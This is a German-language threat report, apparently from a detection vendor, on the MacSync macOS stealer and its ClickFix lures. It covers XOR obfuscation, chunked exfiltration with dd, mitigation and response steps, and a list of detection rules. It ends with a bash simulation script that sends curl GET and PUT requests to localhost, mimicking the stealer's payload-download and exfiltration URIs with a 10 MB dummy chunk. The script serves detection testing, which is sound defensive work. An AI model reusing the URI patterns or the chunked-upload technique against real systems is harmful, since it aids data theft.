MacSync macOS Stealer nutzt ClickFix-Köder zur Umgehung von Erkennungen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
MacSync Stealer ist ein auf macOS ausgerichteter Malware-as-a-Service (MaaS), der sich auf den ClickFix-Stil der sozialen Ingenieurskunst verlässt, um Benutzer dazu zu bringen, bösartige Terminal-Befehle auszuführen. Die Malware folgt einer modularen, mehrstufigen Ausführungskette, die Mach-O-Binärdateien, In-Memory-AppleScript-Ausführung und fragmentierte Datenexfiltration umfasst. Um der Erkennung zu entgehen, verwendet es XOR-Verschleierung, Prozessdaemonisierung und schnelles Entfernen von Forensik-Artefakten.
Untersuchung
Die Untersuchung umfasste das Reverse Engineering eines 64-Bit-Mach-O-Stagers, um seinen Ausführungsfluss und seine Ausweichtechniken zu kartieren. Forscher identifizierten eine C++-Schablonenklasse, die Einzelbyte-XOR-Verschlüsselung mit dem Schlüssel 0xAA verwendet, um funktionale Zeichenketten und C2-Endpunkte zu verschleiern. Die Analyse enthüllte auch einen fortschrittlichen Exfiltrationsmechanismus, der das dd Hilfsprogramm nutzt, um gestohlene Daten in 10 MB große Stücke zu teilen, bevor sie per HTTP-POST übertragen werden.
Minderung
Benutzer sollten geschult werden, um das Kopieren und Einfügen von Terminalbefehlen, die durch Browserfehler, gefälschte Überprüfungsseiten oder ClickFix-Pop-ups ausgelöst werden, zu vermeiden. Organisationen sollten die Terminalaktivität und unautorisierte Ausführung von osascriptgenau überwachen. Das Einschränken von nicht notarisierten Binärdateien und das Überwachen verdächtiger Dateierstellung oder Ausführung in /tmp kann die Exposition weiter reduzieren.
Reaktion
Wenn MacSync-Aktivitäten erkannt werden, sollte der betroffene macOS-Endpunkt sofort isoliert werden, um weitere Datenexfiltration zu stoppen. Responder sollten eine forensische Analyse des Verzeichnisses /tmp durchführen und ~/Library/LaunchAgents/ auf bösartige Persistenz-Plists überprüfen. Systemprotokolle sollten auch auf unautorisierte osascript Ausführung überprüft und Netzwerkverkehr auf Verbindungen zu bekannten C2-Domains überprüft werden.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Verdächtiger Curl-Ausführungsversuch [MacOS] (über cmdline)
Archiv wurde im temporären Ordner von MacOS erstellt (über file_event)
IOCs (HashSha256) zur Erkennung: MacSync: Der ausweichende macOS Stealer, der ClickFix-Köder ausnutzt
IOCs (HashSha1) zur Erkennung: MacSync: Der ausweichende macOS Stealer, der ClickFix-Köder ausnutzt
IOCs (HashMd5) zur Erkennung: MacSync: Der ausweichende macOS Stealer, der ClickFix-Köder ausnutzt
MacSync Stealer – URI-basierte Erkennung [Webserver]
MacSync: Versteckte Session-Daemonisierung auf macOS [Linux Prozess-Erstellung]
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Pre-Flight-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Technik des Gegners (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die von der Erkennungslogik erwartete Telemetrie zu generieren. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle: Der Angreifer beabsichtigt, den Kommunikationslebenszyklus des MacSync Stealers nachzuahmen. Zuerst simuliert der Angreifer eine „Clickfix“-Täuschung, bei der die Maschine eines Opfers angewiesen wird, eine Nutzlast über eine spezielle URI herunterzuladen:
/dynamic?txd=. Sobald die „Malware“ läuft, führt sie die Exfiltration durch, indem sie gestohlene Datenstücke über einenPUTAnfrage an die URI/gate?buildtxd=zurück an den C2-Server sendet. Dies simuliert genau das Muster, nach dem die Erkennungsregel sucht. -
Regressionstest-Skript: Dieses Skript verwendet
curlum die spezifischen HTTP-Anfragen zu erzeugen, die den URI-Auswahlkriterien der Sigma-Regel entsprechen.#!/bin/bash # MacSync Stealer URI Simulationsskript # Dieses Skript simuliert die GET- und PUT-Anfragen, die von MacSync verwendet werden TARGET_URL="http://localhost" echo "[+] Simulierung des Payload-Downloads (GET /dynamic?txd=)..." curl -X GET "$TARGET_URL/dynamic?txd=malicious_payload_123" -s -o /dev/null echo "[+] Simulierung der Daten-Exfiltration (PUT /gate?buildtxd=)..." # Simulation eines 10 MB großen Chunk-Uploads wie in der Regelbeschreibung erwähnt dd if=/dev/urandom of=chunk.bin bs=1M count=10 2>/dev/null curl -X PUT "$TARGET_URL/gate?buildtxd=exfil_data_456" --data-binary @chunk.bin -s -o /dev/null echo "[+] Simulation abgeschlossen." -
Bereinigungskommandos:
# Entfernen Sie den während der Simulation erstellten Dummy-Daten-Chunk rm -f chunk.bin